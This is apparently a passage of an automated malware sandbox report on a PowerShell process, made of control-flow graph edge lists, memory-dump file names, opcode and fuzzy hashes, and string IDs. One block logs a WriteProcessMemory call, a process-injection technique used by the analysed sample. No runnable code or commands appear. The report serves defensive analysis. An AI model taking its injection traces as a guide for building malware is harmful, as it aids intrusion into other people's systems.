756a7f0-756a8cd 2553->2556 2573 756a8d3-756a8ed 2556->2573 2574 756ac2a-756ad32 2556->2574 2562->2492 2575 756a8ef-756a914 2573->2575 2576 756a91c-756a929 2573->2576 2581 756ad34-756ad59 2574->2581 2582 756ad61-756ad96 2574->2582 2575->2576 2579 756ab91-756abda 2576->2579 2580 756a92f-756a973 2576->2580 2579->2359 2579->2574 2580->2579 2591 756a979-756a999 2580->2591 2581->2582 2582->2518 2590 756ad9c-756adca 2582->2590 2590->2518 2594 756add0-756ae42 2590->2594 2591->2579 2597 756a99f-756a9d2 2591->2597 2609 756ae44-756ae5f 2594->2609 2610 756ae70-756ae76 2594->2610 2597->2579 2604 756a9d8-756aa38 2597->2604 2604->2579 2612 756aa3e-756aa9e 2604->2612 2610->2518 2612->2579 2617 756aaa4-756ab2d 2612->2617 2617->2579 2622 756ab2f-756ab8c 2617->2622 2622->2574
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2860560106.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7560000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'sq$4'sq
                                                                                                        • API String ID: 0-780347173
                                                                                                        • Opcode ID: c11c054485ca6eb2afc6bb1f43c2658b9a9bc106f48a24e756616c3a6b625632
                                                                                                        • Instruction ID: 21bee152ed328119f0a36cbbf8cc919c270a5cfee551b1ec25ab8a51209813ef
                                                                                                        • Opcode Fuzzy Hash: c11c054485ca6eb2afc6bb1f43c2658b9a9bc106f48a24e756616c3a6b625632
                                                                                                        • Instruction Fuzzy Hash: 61C23CB4A002159FDB54CB58C854BAABBB2FF84304F54C1E9DA09AB345CB71ED82CF95

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 2627 6f73e43-6f73e4f 2628 6f73e66-6f73e88 2627->2628 2629 6f73e51-6f73e53 2627->2629 2633 6f73dc3-6f73dcf 2629->2633 2634 6f73dd1-6f73e03 WriteProcessMemory 2629->2634 2633->2634 2635 6f73e0a 2634->2635 2636 6f73e13-6f73e27 2635->2636 2637 6f73e0c-6f73e12 2635->2637 2637->2636
                                                                                                        APIs
                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,00000001), ref: 06F73DFD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2856555642.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_6f70000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessWrite
                                                                                                        • String ID: k^
                                                                                                        • API String ID: 3559483778-1258544224
                                                                                                        • Opcode ID: 66d2b7e7e281d8f20916280bbfc530a7d840dfdf338ae206732dc581d251cb6b
                                                                                                        • Instruction ID: 2f1cd3438f53e8b3b53d31e6baa5fe93d52e08f2b842dcef5c22b9a1f6b78cb6
                                                                                                        • Opcode Fuzzy Hash: 66d2b7e7e281d8f20916280bbfc530a7d840dfdf338ae206732dc581d251cb6b
                                                                                                        • Instruction Fuzzy Hash: C83167B2D00249DFCB50CFA9D885ADEBBF4FB48310F14842EE919A7310D7749544CBA0

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 2640 7568d34-7568d37 2641 7568d3d-7568da9 2640->2641 2642 7568d39 2640->2642 2651 7568dae-7568dda 2641->2651 2642->2641 2643 756ae81-756aec5 2642->2643 2654 756aeca 2643->2654 2656 7568de0-7568e03 2651->2656 2657 756aecf-756af87 2651->2657 2654->2654 2662 7568e09-7568e1b 2656->2662 2663 7568e24-7568e48 2662->2663 2664 7568e1d 2662->2664 2666 7568e77-7568ee4 2663->2666 2667 7568e4a-7568e6f 2663->2667 2664->2663 2665 7568eeb-7568f0f 2664->2665 2668 7568f11-7568f36 2665->2668 2669 7568f3e-7568f7b 2665->2669 2666->2665 2667->2666 2668->2669 2677 7568f82-7568f8f 2669->2677 2678 7568f95-7568fc8 2677->2678 2679 756ac2c-756ac75 2677->2679 2683 7568ff7-7569004 2678->2683 2684 7568fca-7568fef 2678->2684 2679->2662 2683->2679 2685 756900a-7569060 2683->2685 2684->2683 2685->2679 2692 7569066-75690d1 2685->2692 2699 75690d7-7569112 2692->2699 2700 75696c8-75696ec 2692->2700 2708 7569114-7569139 2699->2708 2709 7569141-756914e 2699->2709 2701 75696ee-7569713 2700->2701 2702 756971b-7569728 2700->2702 2701->2702 2702->2679 2704 756972e-756977d 2702->2704 2717 7569783-7569785 2704->2717 2718 756ac7a-756ad32 2704->2718 2708->2709 2711 7569154-756917c 2709->2711 2712 75694bc-7569505 2709->2712 2711->2712 2719 7569182-75691aa 2711->2719 2754 75695a3-75695bd 2712->2754 2722 756978b-756979d 2717->2722 2723 756ad34-756ad59 2718->2723 2724 756ad61-756ad96 2718->2724 2719->2712 2732 75691b0-7569206 2719->2732 2725 75697a6-75697ca 2722->2725 2726 756979f 2722->2726 2723->2724 2724->2643 2742 756ad9c-756adca 2724->2742 2730 75697cc-75697f1 2725->2730 2731 75697f9-7569859 2725->2731 2726->2725 2729 7569860-7569884 2726->2729 2734 7569886-75698ab 2729->2734 2735 75698b3-75698c0 2729->2735 2730->2731 2731->2729 2732->2712 2753 756920c-75692a4 2732->2753 2734->2735 2737 75698c6-75698f4 2735->2737 2738 756abdc-756ac25 2735->2738 2737->2738 2752 75698fa-7569928 2737->2752 2738->2722 2742->2643 2751 756add0-756ae42 2742->2751 2786 756ae44-756ae5f 2751->2786 2787 756ae70-756ae76 2751->2787 2752->2738 2762 756992e-756995c 2752->2762 2753->2712 2788 75692aa-756933e 2753->2788 2756 75695bf-75695e4 2754->2756 2757 75695ec-7569621 2754->2757 2756->2757 2757->2679 2769 7569627-756964b 2757->2769 2762->2738 2773 7569962-7569a3f 2762->2773 2769->2679 2777 7569651-75696ad 2769->2777 2807 7569d05-7569d29 2773->2807 2808 7569a45-7569a5f 2773->2808 2800 75696c3 2777->2800 2801 75696af-75696be 2777->2801 2787->2643 2788->2754 2814 7569344-756935e 2788->2814 2800->2677 2800->2700 2801->2677 2810 7569d2b-7569d50 2807->2810 2811 7569d58-7569e6e 2807->2811 2812 7569a61-7569a86 2808->2812 2813 7569a8e-7569a9b 2808->2813 2810->2811 2860 7569e74-7569e8e 2811->2860 2861 756a0d1-756a0ff 2811->2861 2812->2813 2815 7569aa1-7569ae5 2813->2815 2816 7569cbc-7569d00 2813->2816 2817 7569367-756938b 2814->2817 2818 7569360 2814->2818 2815->2816 2836 7569aeb-7569b0b 2815->2836 2816->2807 2823 756938d-75693b2 2817->2823 2824 75693ba-756940b 2817->2824 2818->2817 2821 75694b7 2818->2821 2822 7569412-7569436 2818->2822 2821->2754 2822->2700 2827 756943c-7569469 2822->2827 2823->2824 2824->2822 2827->2700 2836->2816 2844 7569b11-7569b44 2836->2844 2844->2816 2851 7569b4a-7569baa 2844->2851 2851->2816 2858 7569bb0-7569c5e 2851->2858 2858->2816 2881 7569c60-7569cba 2858->2881 2866 7569e90-7569e9c 2860->2866 2867 7569eb8 2860->2867 2877 756a104-756a154 2861->2877 2869 7569ea6-7569eac 2866->2869 2870 7569e9e-7569ea4 2866->2870 2872 7569ebe-7569f0c 2867->2872 2873 7569eb6 2869->2873 2870->2873 2872->2861 2885 7569f12-7569f27 2872->2885 2873->2872 2877->2643 2881->2807 2890 7569f41-7569f76 2885->2890 2891 7569f29-7569f2f 2885->2891 2890->2861 2899 7569f7c-7569f9c 2890->2899 2893 7569f33-7569f3f 2891->2893 2894 7569f31 2891->2894 2893->2890 2894->2890 2899->2861 2901 7569fa2-756a086 2899->2901 2901->2861 2912 756a088-756a0cf 2901->2912 2912->2877
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2860560106.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7560000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'sq$4'sq
                                                                                                        • API String ID: 0-780347173
                                                                                                        • Opcode ID: 8743374ad5ed22c34a9d4ecf1e9d0508502a5767b4654a224300482c8baf2f1f
                                                                                                        • Instruction ID: 5b8f0c6a0e75e63bbdaa63b5b4dbc104938c234e3ab6551c08c19afdacc080a3
                                                                                                        • Opcode Fuzzy Hash: 8743374ad5ed22c34a9d4ecf1e9d0508502a5767b4654a224300482c8baf2f1f
                                                                                                        • Instruction Fuzzy Hash: 23B251B4A002159FDB54CB58C894BAAB7B2FF84304F5481E9DA09AF345CB71ED82CF95

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 2917 75a92c0-75a92e2 2918 75a9a9b-75a9ace 2917->2918 2919 75a92e8-75a92ed 2917->2919 2935 75a9b0e 2918->2935 2936 75a9ad0-75a9ae1 2918->2936 2920 75a92ef-75a92f5 2919->2920 2921 75a9305-75a930c 2919->2921 2923 75a92f9-75a9303 2920->2923 2924 75a92f7 2920->2924 2921->2918 2925 75a9312-75a9317 2921->2925 2923->2921 2924->2921 2926 75a9319-75a931f 2925->2926 2927 75a932f-75a9336 2925->2927 2931 75a9323-75a932d 2926->2931 2932 75a9321 2926->2932 2927->2918 2928 75a933c-75a9341 2927->2928 2933 75a9359 2928->2933 2934 75a9343-75a9349 2928->2934 2931->2927 2932->2927 2940 75a935c-75a9366 2933->2940 2938 75a934b 2934->2938 2939 75a934d-75a9357 2934->2939 2937 75a9b10-75a9b12 2935->2937 2951 75a9ba0-75a9bc5 2936->2951 2952 75a9ae7-75a9aec 2936->2952 2942 75a9b4a-75a9b54 2937->2942 2943 75a9b14-75a9b31 2937->2943 2938->2933 2939->2933 2940->2918 2944 75a936c-75a9371 2940->2944 2947 75a9b5f-75a9b65 2942->2947 2948 75a9b56-75a9b5c 2942->2948 2963 75a9b99-75a9b9e 2943->2963 2964 75a9b33-75a9b44 2943->2964 2949 75a9389-75a93a8 2944->2949 2950 75a9373-75a9379 2944->2950 2956 75a9b6b-75a9b77 2947->2956 2957 75a9b67-75a9b69 2947->2957 2953 75a93aa-75a93d4 2949->2953 2954 75a93d7-75a93e1 2949->2954 2958 75a937b 2950->2958 2959 75a937d-75a9387 2950->2959 2960 75a9aee-75a9af4 2952->2960 2961 75a9b04-75a9b0c 2952->2961 2953->2954 2954->2918 2962 75a93e7-75a93ec 2954->2962 2966 75a9b79-75a9b96 2956->2966 2957->2966 2958->2949 2959->2949 2967 75a9af8-75a9b02 2960->2967 2968 75a9af6 2960->2968 2961->2937 2970 75a93ee-75a93f4 2962->2970 2971 75a9404-75a9435 2962->2971 2963->2964 2964->2942 2967->2961 2968->2961 2976 75a93f8-75a9402 2970->2976 2977 75a93f6 2970->2977 2971->2918 2984 75a943b-75a9443 2971->2984 2976->2971 2977->2971 2985 75a945b-75a946d 2984->2985 2986 75a9445-75a944b 2984->2986 2985->2918 2989 75a9473-75a947b 2985->2989 2987 75a944f-75a9459 2986->2987 2988 75a944d 2986->2988 2987->2985 2988->2985 2990 75a947d-75a9483 2989->2990 2991 75a9493-75a94a5 2989->2991 2993 75a9487-75a9491 2990->2993 2994 75a9485 2990->2994 2991->2918 2995 75a94ab-75a94b0 2991->2995 2993->2991 2994->2991 2996 75a94c8-75a94d4 2995->2996 2997 75a94b2-75a94b8 2995->2997 2996->2918 2998 75a94da-75a94f8 2996->2998 3000 75a94ba 2997->3000 3001 75a94bc-75a94c6 2997->3001 3004 75a94fa-75a9500 2998->3004 3005 75a9512-75a955c 2998->3005 3000->2996 3001->2996 3006 75a9502 3004->3006 3007 75a9504-75a9510 3004->3007 3014 75a9562-75a9594 3005->3014 3015 75a9a80-75a9a8c 3005->3015 3006->3005 3007->3005 3018 75a95bd-75a95c7 3014->3018 3019 75a9596-75a95b5 3014->3019 3020 75a95cd-75a95d2 3018->3020 3021 75a9843-75a9878 3018->3021 3019->3018 3022 75a95ea-75a961b 3020->3022 3023 75a95d4-75a95da 3020->3023 3052 75a994e-75a9962 3021->3052 3022->3021 3031 75a9621-75a9629 3022->3031 3025 75a95de-75a95e8 3023->3025 3026 75a95dc 3023->3026 3025->3022 3026->3022 3032 75a962b-75a9631 3031->3032 3033 75a9641-75a9653 3031->3033 3036 75a9633 3032->3036 3037 75a9635-75a963f 3032->3037 3033->3021 3034 75a9659-75a9661 3033->3034 3038 75a9679-75a968b 3034->3038 3039 75a9663-75a9669 3034->3039 3036->3033 3037->3033 3038->3021 3042 75a9691-75a9696 3038->3042 3040 75a966b 3039->3040 3041 75a966d-75a9677 3039->3041 3040->3038 3041->3038 3045 75a9698-75a969e 3042->3045 3046 75a96ae-75a96ba 3042->3046 3048 75a96a2-75a96ac 3045->3048 3049 75a96a0 3045->3049 3046->3021 3051 75a96c0-75a96f1 3046->3051 3048->3046 3049->3046 3060 75a970b-75a977d 3051->3060 3061 75a96f3-75a96f9 3051->3061 3055 75a998b-75a99b4 3052->3055 3056 75a9964-75a9983 3052->3056 3055->2918 3062 75a99ba-75a99bf 3055->3062 3056->3055 3060->3021 3087 75a9783-75a97a4 3060->3087 3063 75a96fb 3061->3063 3064 75a96fd-75a9709 3061->3064 3065 75a99c1-75a99c7 3062->3065 3066 75a99d7-75a99e6 3062->3066 3063->3060 3064->3060 3067 75a99cb-75a99d5 3065->3067 3068 75a99c9 3065->3068 3066->2918 3070 75a99ec-75a99f3 3066->3070 3067->3066 3068->3066 3072 75a9a0b-75a9a65 3070->3072 3073 75a99f5-75a99fb 3070->3073 3089 75a9a7b 3072->3089 3090 75a9a67-75a9a76 3072->3090 3076 75a99ff-75a9a09 3073->3076 3077 75a99fd 3073->3077 3076->3072 3077->3072 3092 75a97be-75a97c0 3087->3092 3093 75a97a6-75a97ac 3087->3093 3089->2940 3090->2940 3097 75a97da-75a981f 3092->3097 3098 75a97c2-75a97c8 3092->3098 3095 75a97ae 3093->3095 3096 75a97b0-75a97bc 3093->3096 3095->3092 3096->3092 3097->3021 3107 75a9821-75a9824 3097->3107 3099 75a97ca 3098->3099 3100 75a97cc-75a97d8 3098->3100 3099->3097 3100->3097 3108 75a982e-75a9837 3107->3108 3109 75a983e 3108->3109 3109->3052
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2861127100.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_75a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'sq$4'sq
                                                                                                        • API String ID: 0-780347173
                                                                                                        • Opcode ID: 6d8d01a31442a9a7922ba2dbc2de9f9937db6b9ec4bc8b98ef205b55df166f2c
                                                                                                        • Instruction ID: 922547cd291b4e6449c527af06c6d3d22346711fce558a6a336e16be9a2433e3
                                                                                                        • Opcode Fuzzy Hash: 6d8d01a31442a9a7922ba2dbc2de9f9937db6b9ec4bc8b98ef205b55df166f2c
                                                                                                        • Instruction Fuzzy Hash: 81325EB4B00215AFDB14CB98C994AAEBBB2BFC5314F14C46AE9059F355CB31EC42CB91

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 3220 75afb18-75afb41 3221 75afd0c-75afd54 3220->3221 3222 75afb47-75afb4c 3220->3222 3228 75afd5a-75afd5f 3221->3228 3229 75aff8e-75affad 3221->3229 3223 75afb4e-75afb54 3222->3223 3224 75afb64-75afb70 3222->3224 3226 75afb58-75afb62 3223->3226 3227 75afb56 3223->3227 3234 75afcb9-75afcc3 3224->3234 3235 75afb76-75afb79 3224->3235 3226->3224 3227->3224 3231 75afd61-75afd67 3228->3231 3232 75afd77-75afd83 3228->3232 3239 75afd6b-75afd75 3231->3239 3240 75afd69 3231->3240 3251 75aff39-75aff43 3232->3251 3252 75afd89-75afd8c 3232->3252 3237 75afcd1-75afcd7 3234->3237 3238 75afcc5-75afcce 3234->3238 3235->3234 3236 75afb7f-75afb89 3235->3236 3236->3221 3242 75afb8f-75afb94 3236->3242 3243 75afcd9-75afcdb 3237->3243 3244 75afcdd-75afce9 3237->3244 3239->3232 3240->3232 3247 75afbac-75afbb0 3242->3247 3248 75afb96-75afb9c 3242->3248 3250 75afceb-75afd09 3243->3250 3244->3250 3247->3234 3258 75afbb6-75afbb8 3247->3258 3255 75afb9e 3248->3255 3256 75afba0-75afbaa 3248->3256 3250->3221 3253 75aff51-75aff57 3251->3253 3254 75aff45-75aff4e 3251->3254 3252->3251 3259 75afd92-75afd99 3252->3259 3260 75aff59-75aff5b 3253->3260 3261 75aff5d-75aff69 3253->3261 3255->3247 3256->3247 3262 75afbfa 3258->3262 3263 75afbba-75afbcd 3258->3263 3259->3229 3265 75afd9f-75afda4 3259->3265 3266 75aff6b-75aff8b 3260->3266 3261->3266 3267 75afbfc-75afbfe 3262->3267 3263->3221 3279 75afbd3-75afbd8 3263->3279 3269 75afdbc-75afdc0 3265->3269 3270 75afda6-75afdac 3265->3270 3267->3234 3271 75afc04-75afc32 3267->3271 3269->3251 3277 75afdc6-75afdca 3269->3277 3275 75afdae 3270->3275 3276 75afdb0-75afdba 3270->3276 3307 75afc36-75afc38 3271->3307 3308 75afc34 3271->3308 3275->3269 3276->3269 3280 75afe0a 3277->3280 3281 75afdcc-75afddd 3277->3281 3285 75afbda-75afbe0 3279->3285 3286 75afbf0-75afbf8 3279->3286 3283 75afe0c-75afe0e 3280->3283 3281->3229 3292 75afde3-75afde8 3281->3292 3283->3251 3288 75afe14-75afe1b 3283->3288 3290 75afbe2 3285->3290 3291 75afbe4-75afbee 3285->3291 3286->3267 3293 75afedc-75aff2a 3288->3293 3294 75afe21-75afe26 3288->3294 3290->3286 3291->3286 3297 75afdea-75afdf0 3292->3297 3298 75afe00-75afe08 3292->3298 3323 75aff2f-75aff36 3293->3323 3299 75afe28-75afe2e 3294->3299 3300 75afe3e-75afe7e 3294->3300 3302 75afdf2 3297->3302 3303 75afdf4-75afdf6 3297->3303 3298->3283 3304 75afe32-75afe3c 3299->3304 3305 75afe30 3299->3305 3318 75afe88 3300->3318 3302->3298 3303->3298 3304->3300 3305->3300 3311 75afc42-75afcb6 3307->3311 3308->3311 3327 75afe8b call 6f72cb0 3318->3327 3328 75afe8b call 6f72a58 3318->3328 3329 75afe8b call 6f72a48 3318->3329 3320 75afe90-75afed5 3320->3293 3326 75afed7-75afeda 3320->3326 3326->3323 3327->3320 3328->3320 3329->3320
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2861127100.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_75a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'sq$4'sq
                                                                                                        • API String ID: 0-780347173
                                                                                                        • Opcode ID: 32b6ae856904e5b612d0202aee38d120910294be4ca18d7862780f8327d827de
                                                                                                        • Instruction ID: 408f49f0de98d617016bf8c588621d8925e0624aa7b6d1ea88828f5c5cc943d2
                                                                                                        • Opcode Fuzzy Hash: 32b6ae856904e5b612d0202aee38d120910294be4ca18d7862780f8327d827de
                                                                                                        • Instruction Fuzzy Hash: 9AC1C5B5B04209AFCB54DB68C454AAEBBB2BFC5310F14C47AD9058F296DB31DD82C791

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 3330 722ea90-722eab2 3331 722eba6-722ebcb 3330->3331 3332 722eab8-722eaba 3330->3332 3333 722ebd2-722ebf6 3331->3333 3332->3333 3334 722eac0-722eacc 3332->3334 3346 722ebfd-722ec21 3333->3346 3338 722eae0-722eaf0 3334->3338 3339 722eace-722eada 3334->3339 3338->3346 3347 722eaf6-722eb04 3338->3347 3339->3338 3339->3346 3351 722ec28-722ec6f 3346->3351 3350 722eb0a-722eb0f 3347->3350 3347->3351 3386 722eb11 call 722eca0 3350->3386 3387 722eb11 call 722ea90 3350->3387 3364 722ec71-722ec9d 3351->3364 3353 722eb17-722eb60 3368 722eb62-722eb7b 3353->3368 3369 722eb83-722eba3 call 722cd30 3353->3369 3375 722ec9f-722ecab 3364->3375 3368->3369 3378 722ecb2-722ecc0 call 722df30 3375->3378 3379 722ecad call 722bfe8 3375->3379 3382 722ecc2-722ecc8 3378->3382 3383 722ecd8-722ecda 3378->3383 3379->3378 3384 722ecca 3382->3384 3385 722eccc-722ecce 3382->3385 3384->3383 3385->3383 3386->3353 3387->3353
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2858630208.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7220000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (wq$Hwq
                                                                                                        • API String ID: 0-584953801
                                                                                                        • Opcode ID: d0c03b0ae1feac1dbda54433f85f2b42bb468ef3d672bd3bc139d1becdfe489c
                                                                                                        • Instruction ID: 50a96db83ea48498fe44321ccd8441a9fabf2bab38f311c03c886a32b47a9096
                                                                                                        • Opcode Fuzzy Hash: d0c03b0ae1feac1dbda54433f85f2b42bb468ef3d672bd3bc139d1becdfe489c
                                                                                                        • Instruction Fuzzy Hash: C651D174B002519FDB69AF38C45466EBBA6FF96301B1149ADD4028B3A0CE35DC0ADBA1

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 3388 75afc44-75afc5c 3390 75afd0c-75afd54 3388->3390 3391 75afc62-75afc85 3388->3391 3394 75afd5a-75afd5f 3390->3394 3395 75aff8e-75affad 3390->3395 3396 75afc9f-75afcb6 3391->3396 3397 75afc87-75afc8d 3391->3397 3398 75afd61-75afd67 3394->3398 3399 75afd77-75afd83 3394->3399 3400 75afc8f 3397->3400 3401 75afc91-75afc9d 3397->3401 3402 75afd6b-75afd75 3398->3402 3403 75afd69 3398->3403 3410 75aff39-75aff43 3399->3410 3411 75afd89-75afd8c 3399->3411 3400->3396 3401->3396 3402->3399 3403->3399 3413 75aff51-75aff57 3410->3413 3414 75aff45-75aff4e 3410->3414 3411->3410 3415 75afd92-75afd99 3411->3415 3416 75aff59-75aff5b 3413->3416 3417 75aff5d-75aff69 3413->3417 3415->3395 3418 75afd9f-75afda4 3415->3418 3419 75aff6b-75aff8b 3416->3419 3417->3419 3420 75afdbc-75afdc0 3418->3420 3421 75afda6-75afdac 3418->3421 3420->3410 3425 75afdc6-75afdca 3420->3425 3423 75afdae 3421->3423 3424 75afdb0-75afdba 3421->3424 3423->3420 3424->3420 3427 75afe0a 3425->3427 3428 75afdcc-75afddd 3425->3428 3429 75afe0c-75afe0e 3427->3429 3428->3395 3434 75afde3-75afde8 3428->3434 3429->3410 3432 75afe14-75afe1b 3429->3432 3435 75afedc-75aff2a 3432->3435 3436 75afe21-75afe26 3432->3436 3437 75afdea-75afdf0 3434->3437 3438 75afe00-75afe08 3434->3438 3458 75aff2f-75aff36 3435->3458 3439 75afe28-75afe2e 3436->3439 3440 75afe3e-75afe88 3436->3440 3442 75afdf2 3437->3442 3443 75afdf4-75afdf6 3437->3443 3438->3429 3444 75afe32-75afe3c 3439->3444 3445 75afe30 3439->3445 3462 75afe8b call 6f72cb0 3440->3462 3463 75afe8b call 6f72a58 3440->3463 3464 75afe8b call 6f72a48 3440->3464 3442->3438 3443->3438 3444->3440 3445->3440 3455 75afe90-75afed5 3455->3435 3461 75afed7-75afeda 3455->3461 3461->3458 3462->3455 3463->3455 3464->3455
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2861127100.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_75a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (osq$(osq
                                                                                                        • API String ID: 0-4199119687
                                                                                                        • Opcode ID: 2aa75234d83a647aa4285c984d83158c0193bd6b107b8a6786f158f27c61bad3
                                                                                                        • Instruction ID: debac82403d33b2ab64f8e218ff1229321bdbeee8a4a316e47dd3d8231e548b6
                                                                                                        • Opcode Fuzzy Hash: 2aa75234d83a647aa4285c984d83158c0193bd6b107b8a6786f158f27c61bad3
                                                                                                        • Instruction Fuzzy Hash: 2F51B3B1600205AFDB24CF68C454AEDBBA2FF81310F55C4BAE8059F296CB71ED46CB91

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 3465 75a0488-75a04ab 3466 75a0650-75a06a5 3465->3466 3467 75a04b1-75a04b6 3465->3467 3468 75a04b8-75a04be 3467->3468 3469 75a04ce-75a04d2 3467->3469 3470 75a04c2-75a04cc 3468->3470 3471 75a04c0 3468->3471 3472 75a04d8-75a04da 3469->3472 3473 75a05fd-75a0607 3469->3473 3470->3469 3471->3469 3475 75a04ea 3472->3475 3476 75a04dc-75a04e8 3472->3476 3477 75a0609-75a0612 3473->3477 3478 75a0615-75a061b 3473->3478 3480 75a04ec-75a04ee 3475->3480 3476->3480 3482 75a061d-75a061f 3478->3482 3483 75a0621-75a062d 3478->3483 3480->3473 3484 75a04f4-75a0513 3480->3484 3486 75a062f-75a064d 3482->3486 3483->3486 3494 75a0532 3484->3494 3495 75a0515-75a0530 3484->3495 3496 75a0534-75a0536 3494->3496 3495->3496 3496->3473 3498 75a053c-75a0540 3496->3498 3498->3473 3499 75a0546-75a0565 3498->3499 3503 75a057d-75a0582 3499->3503 3504 75a0567-75a056d 3499->3504 3507 75a0589-75a058b 3503->3507 3505 75a056f 3504->3505 3506 75a0571-75a0573 3504->3506 3505->3503 3506->3503 3508 75a058d-75a0593 3507->3508 3509 75a05a3-75a05fa 3507->3509 3510 75a0597-75a0599 3508->3510 3511 75a0595 3508->3511 3510->3509 3511->3509
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2861127100.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_75a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'sq$4'sq
                                                                                                        • API String ID: 0-780347173
                                                                                                        • Opcode ID: 28f310101ff957e5d3954bbebc0f83bb58cdc54411080d7420f54bf416ffbad4
                                                                                                        • Instruction ID: b7ce4f53406e2fdcbf4defbc91e569aac6750ca597eb249c445ad4c0e341f32a
                                                                                                        • Opcode Fuzzy Hash: 28f310101ff957e5d3954bbebc0f83bb58cdc54411080d7420f54bf416ffbad4
                                                                                                        • Instruction Fuzzy Hash: 1D5105B1B19345AFCF11967498207AE7BA1BFC6214F1480BBD509CB2D2EA35C885C7A2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2861127100.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_75a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'sq$tPsq
                                                                                                        • API String ID: 0-3827892685
                                                                                                        • Opcode ID: 3c02fb45d107c02f1d4d1a27cd9e1551a1396eb0bb665b169424b234d91dd9d9
                                                                                                        • Instruction ID: 264a87c957fe943e40e1bbbb38ef7a9632246c6e7a9b42b0602b377b5e302a5f
                                                                                                        • Opcode Fuzzy Hash: 3c02fb45d107c02f1d4d1a27cd9e1551a1396eb0bb665b169424b234d91dd9d9
                                                                                                        • Instruction Fuzzy Hash: 2E41E0B0B04246AFDB248F69C454BEEB7F2BF89210F18C4BAD5159B291DB31DC42CB61

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 3728 75a6ae0-75a6af2 3729 75a6af8-75a6b09 3728->3729 3730 75a6bb2-75a6c2c 3728->3730 3733 75a6b0b-75a6b11 3729->3733 3734 75a6b23-75a6b40 3729->3734 3753 75a6c58-75a6c5d 3730->3753 3754 75a6c2e-75a6c3c 3730->3754 3736 75a6b13 3733->3736 3737 75a6b15-75a6b21 3733->3737 3734->3730 3741 75a6b42-75a6b64 3734->3741 3736->3734 3737->3734 3745 75a6b7e-75a6b96 3741->3745 3746 75a6b66-75a6b6c 3741->3746 3751 75a6b98-75a6b9a 3745->3751 3752 75a6ba4-75a6baf 3745->3752 3747 75a6b6e 3746->3747 3748 75a6b70-75a6b7c 3746->3748 3747->3745 3748->3745 3751->3752 3753->3754 3758 75a6c43-75a6c52 3754->3758 3758->3753
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2861127100.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
